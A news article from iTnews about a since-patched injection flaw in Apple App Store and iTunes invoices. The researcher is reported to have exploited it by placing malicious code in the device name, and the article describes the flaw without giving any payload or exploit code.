Critical vulnerability found in Apple App Store, iTunes

By

Device name in invoices can be swapped with malicious code.

Researchers have discovered a critical flaw in Apple's App Store and iTunes invoicing system that could allow attackers to hijack sessions, redirect to external sources and launch persistent phishing attacks.

Critical vulnerability found in Apple App Store, iTunes

Vulnerability Lab researcher Benjamin Kunz Mejri published details of the flaw and a proof of concept today.

The application-side input validation web vulnerability is deemed critical because it allows remote attackers to inject malicious code in Apple's flawed content function and services modules.

When a user buys something from iTunes or the App Store, Apple's systems use the device name as part of the invoice sent to the buyer and seller.

A remote hacker can exploit the flaw by manipulating the device name and replacing it with malicious code, which then gets sent on to the seller and buyer accounts through the invoice, Merji found.

Attackers could then hijack sessions, redirect to external sources and launch persistent phishing attacks as well as “persistent manipulation of affected or connected service module context,” Mejri warned.

"The invoice is present to both parties (buyer and seller) which demonstrates a significant risk to buyers, sellers or Apple website managers/developers," he said.

"The issue impact [is] also the risk that a buyer can be the seller by usage of the same name to compromise the store online service integrity."

Reproducing the vulnerability was as easy as replacing your device name with malicious code, buying something from the App Store or iTunes, and receiving the invoice generated after the purchase which contains the malicious script, he said.

Mejri discovered the vulnerability in June and reported it to Apple. 

It appears the company patched the hole soon after being notified of its existence.

Apple included fixes for 80 security issues in its most recent set of patches for OS X and iOS earlier this month.

Got a news tip for our journalists? Share it with us anonymously here.
Copyright © iTnews.com.au . All rights reserved.
Tags:

Most Read Articles

Qantas facing 'significant' data theft after cyber attack

Qantas facing 'significant' data theft after cyber attack

Home Affairs officer accessed data on "friends and associates"

Home Affairs officer accessed data on "friends and associates"

International Criminal Court hit by cyber attack

International Criminal Court hit by cyber attack

Ex-student charged over Western Sydney University cyberattacks

Ex-student charged over Western Sydney University cyberattacks

Log In

  |  Forgot your password?